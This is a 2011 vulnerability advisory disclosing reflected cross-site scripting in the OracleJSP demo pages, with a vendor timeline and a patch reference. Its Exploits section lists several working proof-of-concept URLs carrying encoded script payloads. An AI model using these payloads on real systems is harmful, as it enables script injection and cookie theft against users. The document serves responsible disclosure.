Advisory Name: Reflected Cross-Site Scripting (XSS) in OracleJSP Demos 

 

Internal Cybsec Advisory Id: 2011-0403- Reflected Cross-Site Scripting (XSS) in OracleJSP Demos

 

Vulnerability Class: Reflected Cross-Site Scripting (XSS)

 

Release Date:  April 20, 2011

 

Affected Applications: Confirmed in OracleJSP 1.1.2.4.0 with iAS v1.0.2.2. Other versions may also be affected

 

Affected Platforms: Any running OracleJSP Demos 

 

Local / Remote: Remote 

 

Severity: Medium - CVSS: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)

 

Researcher: Nahuel Grisolia

 

Vendor Status: Patched

 

Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf

 

Vulnerability Description:

 

A reflected Cross Site Scripting vulnerability was found in OracleJSP 1.1.2.4.0 Demos with iAS v1.0.2.2, because scripts fail to sanitize user-supplied input. The vulnerability can be triggered by any user who is able access those Demos.

 

Exploits: 

 

http://171.XXX.XX.64/demo/sql/index.jsp?connStr=%22%3E%3Cscript%3Ealert%28%22XSs%22%29;%3C/script%3E

 

 

http://171.XXX.XX.64/demo/basic/hellouser/hellouser.jsp?newName=%3Cscript%3Ealert%28%22XSs%22%29;%3C%2Fscript%3E

 

 

http://171.XXX.XX.64/demo/basic/hellouser/hellouser_jml.jsp?newName=%3Cscript%3Ealert%28%22XSs%22%29%3B%3C%2Fscript%3E

 

 

http://171.XXX.XX.64/demo/basic/simple/welcomeuser.jsp?user=%3Cscript%3Ealert%28%22XSs%22%29%3B%3C%2Fscript%3E

 

 

 

 

 

http://171.XXX.XX.64/demo/basic/simple/usebean.jsp?newName=%3Cscript%3Ealert%28%22XSs%22%29%3B%3C%2Fscript%3E

 

http://171.XXX.XX.64/demo/ojspext/jmltype/index.jsp, in field "String Test"

 

Impact:

 

An affected user may unintentionally execute scripts or actions written by an attacker. In addition, an attacker may obtain authorization cookies that would allow him to gain unauthorized access to the application.

 

Solution: Install Oracle Critical Patch Update (CPU) - April 2011.

 

Vendor Response: 

Feb 4, 2010 - Vendor contacted.

Feb 5, 2010 - Vendor asks for mor detailed information, which is provided by Cybsec.

Feb 8, 2010 - Vendor acknowledges vulnerability and assigns internal tracking ID  "12907193".

Apr 15, 2011 - Vendor informs vulnerability will be fixed in upcoming Critical Patch Update.

Apr 18, 2011 - Vendor informs that the vulnerability is fixed in the upcoming Critical Patch Update (CPU) due to be released on April 19, 2011.

Apr 19, 2011 - Vendor publishes CPU.

Apr 20. 2011 - Cybsec Publishes Vulnerability.

     

Contact Information:

 

For more information regarding the vulnerability feel free to contact Cybsec Labs at 

cybseclabs <at> cybsec <dot> com

 

About CYBSEC S.A. Security Systems 

 

Since 1996 CYBSEC S.A. is devoted exclusively to provide professional services specialized in Computer Security. More than 150 clients around the globe validate our quality and professionalism. 

 

To keep objectivity, CYBSEC S.A. does not represent, neither sell, nor is associated with other software and/or hardware provider companies. 

 

Our services are strictly focused on Information Security, protecting our clients from emerging security threats, maintaining their IT deployments available, safe, and reliable. 

 

Beyond professional services, CYBSEC is continuously researching new defense and attack techniques and contributing with the security community with high quality information exchange. 

 

For more information, please visit www.cybsec.com 

 

(c) 2011 - CYBSEC S.A. Security Systems